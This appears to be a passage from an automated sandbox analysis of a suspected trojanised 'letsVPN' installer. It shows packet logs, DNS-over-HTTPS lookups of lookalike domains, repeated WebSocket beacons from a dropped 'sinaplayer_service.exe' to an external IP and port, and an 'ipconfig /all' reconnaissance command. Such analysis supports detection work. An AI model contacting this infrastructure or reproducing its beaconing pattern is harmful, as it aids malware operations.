                                                                                                                                                                                                  Dec 29, 2024 16:15:57.373138905 CET49951443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.375825882 CET49951443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.375837088 CET443499518.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.375974894 CET443499518.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.376040936 CET49951443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.376985073 CET49958443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.377007961 CET443499588.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.377084970 CET49958443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.379123926 CET49958443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.379133940 CET443499588.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.681051970 CET15628499528.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.681262016 CET4995215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.681411028 CET4995215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.803217888 CET15628499528.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:59.672422886 CET443499588.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:59.672524929 CET49958443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:59.744627953 CET49958443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:59.744640112 CET443499588.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:59.744788885 CET443499588.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:59.744848013 CET49958443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:16:00.056715012 CET49964443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:00.056761026 CET44349964183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:00.056821108 CET49964443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:00.058016062 CET49964443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:00.058028936 CET44349964183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.141493082 CET4997015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.263271093 CET15628499708.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.263360023 CET4997015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.265670061 CET4997015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.389961004 CET15628499708.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.447033882 CET44349964183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.447132111 CET49964443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.685496092 CET49964443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.685525894 CET44349964183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.685760975 CET44349964183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.686090946 CET49964443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.687283039 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.687339067 CET44349971183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.687397957 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.688159943 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.688177109 CET44349971183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.037316084 CET15628499708.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.037535906 CET4997015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.037564993 CET4997015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.158351898 CET15628499708.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.277203083 CET44349971183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.277395964 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.279678106 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.279686928 CET44349971183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.279824972 CET44349971183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.279872894 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.280967951 CET49977443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.281001091 CET44349977183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.281075954 CET49977443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.281745911 CET49977443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.281757116 CET44349977183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:08.217792034 CET44349977183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:08.217889071 CET49977443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:33.695890903 CET50008443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:16:33.695933104 CET443500088.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.289905071 CET49971443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.289938927 CET44349971183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.419676065 CET15628500418.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.419751883 CET5004115628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.419795036 CET5004115628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.540664911 CET15628500418.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.895925045 CET50015443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:16:35.895951033 CET443500158.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967072010 CET50027443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967155933 CET4435002735.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967376947 CET4435002735.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967443943 CET50027443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967899084 CET50042443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967940092 CET4435004235.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.968004942 CET50042443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.973063946 CET50042443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.973088026 CET4435004235.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:37.953711987 CET50021443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:37.953753948 CET4435002135.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.241689920 CET49977443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.241717100 CET44349977183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986685991 CET4435004235.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986767054 CET50042443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986793995 CET4435004235.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986840963 CET50042443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET1.1.1.1192.168.2.60xb79dNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET1.1.1.1192.168.2.60xb79dNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                  • d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  • 8.217.212.245:15628
                                                                                                                                                                                                  • ws-ap1.pusher.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49730 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:14:33.560028076 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: EAIFCJJtIpBBrGEUCHJJUtCpE
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49750 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:14:40.930923939 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: hgEoGyIHHcKxHmeBCkGUPHIER
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49769 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:14:48.571012974 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: EHDtHuIBUdDVfHXhrVyFEUGzF
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49787 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:14:55.917619944 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: COcjDJHEDQoOInBCDDGFarHDU
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49804 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:03.291205883 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: qphGfKuJZRHBtITmGBcfpvVDU
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49822 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:10.654129028 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: UqeIpIqArHhSexIQlmFYlJBoG
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49840 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:18.011476040 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: DXBHDqPpLFlTgCIrHHBxEKHKP
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49857 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:25.464725018 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: hyKyGMDiwJKCSQjDasFQwJaKH
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49862 | 18.136.85.30 | 80 | 4820 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:27.395387888 CET | 265 | OUT | GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1
Host: ws-ap1.pusher.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: ZmQxOTJiYTctZGRlMS00Zg==
Origin: ws://ws-ap1.pusher.com
Dec 29, 2024 16:15:28.998764992 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
Date: Sun, 29 Dec 2024 15:15:28 GMT
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: /lIrq6W0b1fOEX3Qqf4D7edtBBE=
Dec 29, 2024 16:15:29.700167894 CET | 242 | IN | Data Raw: 81 7e 00 92 7b 22 65 76 65 6e 74 22 3a 22 70 75 73 68 65 72 3a 65 72 72 6f 72 22 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 34 30 30 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 70 70 20 6b 65 79 20 34 66 63 34 33 36 65 66 33 36 66 34 30 32 36
Data Ascii: ~{"event":"pusher:error","data":{"code":4001,"message":"App key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?"}}ZApp key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?
Dec 29, 2024 16:15:29.751595974 CET | 8 | OUT | Data Raw: 88 82 d5 53 2a 0f d6 bb
Data Ascii: S*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49886 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:32.707348108 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: WfxndBCwxGPkHVEIkfBOKFtIS
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49907 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:40.103064060 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: CGuKfKJpiJIQgrIIGFFIHJHHJ
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49932 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:47.563971043 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: yhrCHtBBGdQDZCyKHJjbdBnHK
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49952 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:15:54.916284084 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: FoPFDZlWHBTCtkBnNJIzYtBHV
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49970 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:16:02.265670061 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: BKUcFWzXCrUNNGuBHHCSIyZHK
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49989 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:16:09.613966942 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: oqRHpJDqHRNDHUVBBFHIccFjW
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50010 | 8.217.212.245 | 15628 | 6368 | C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:16:16.964860916 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: WwPxFgueJfqDBCQDPnCJYZTEB
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.2.6 | 50033 | 8.217.212.245 | 15628
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:16:25.176661968 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: KdIFBVttISDfKflFDZBItwEBs
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.2.6 | 50041 | 8.217.212.245 | 15628
Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:16:32.526065111 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: iDHKdRHDOTuLoEMRwtCCiifOE
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49879 | 13.227.9.24 | 443 | 4820 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:15:32 UTC | 180 | OUT | GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1
Host: d1dmgcawtbm6l9.cloudfront.net
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-12-29 15:15:33 UTC | 676 | IN | HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: nginx/1.16.0
Date: Sun, 29 Dec 2024 15:15:32 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Expires: Sun, 29 Dec 2024 15:15:32 GMT
Cache-Control: private, max-age=3
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: BAH53-C1
X-Amz-Cf-Id: iiNqGHiX0fNnrJ0bEDjMqU-PuNMaxxF3lOssp3YfslQVyOcMEEejdQ==
2024-12-29 15:15:33 UTC | 660 | IN | Data Ascii: 28d{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nal.fqoqehwib.com.","type":1}],"Answer":[{"name":"nal.fqoqehwib.com.","type":1,"TTL":3,"data":"6.114.13.159"},{"name":"nal.fqoqehwib.com.","type":1,"TTL":3,"data":"
2024-12-29 15:15:33 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49878 | 13.227.9.24 | 443 | 4820 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:15:32 UTC | 183 | OUT | GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1
Host: d1dmgcawtbm6l9.cloudfront.net
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-12-29 15:15:33 UTC | 676 | IN | HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: nginx/1.16.0
Date: Sun, 29 Dec 2024 15:15:33 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Expires: Sun, 29 Dec 2024 15:15:33 GMT
Cache-Control: private, max-age=5
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 1484e663ceddae5460cfdb19a3c7d448.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: BAH53-C1
X-Amz-Cf-Id: c53v0Tw8HzjJ012m4h0a0NMvqWjBjc6MyHPOKSC7LHq2wArgzr0SaQ==
2024-12-29 15:15:33 UTC | 465 | IN | Data Ascii: 1ca{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"chr.alipayassets.com.","type":1}],"Answer":[{"name":"chr.alipayassets.com.","type":1,"TTL":5,"data":"129.180.217.138"},{"name":"chr.alipayassets.com.","type":1,"TTL
2024-12-29 15:15:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49877 | 13.227.9.24 | 443 | 4820 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:15:32 UTC | 182 | OUT | GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
2024-12-29 15:15:33 UTC | 676 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:15:33 GMT
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:15:33 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=2
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: _43twzA0f2-TE79r8RnBEbwWyu9CqgbDGkaM7-6jfLAz3YZ4TdP9gQ==
2024-12-29 15:15:33 UTC | 604 | IN | Data Ascii: 255{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nit.crash1ytics.com.","type":1}],"Answer":[{"name":"nit.crash1ytics.com.","type":1,"TTL":2,"data":"124.119.121.174"},{"name":"nit.crash1ytics.com.","type":1,"TTL":2
2024-12-29 15:15:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0



                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:10:14:17
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\letsVPN.exe"
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5 hash:EF0F5B020EA3238A98642CD7B56D84BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff61fb20000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff75d720000
                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
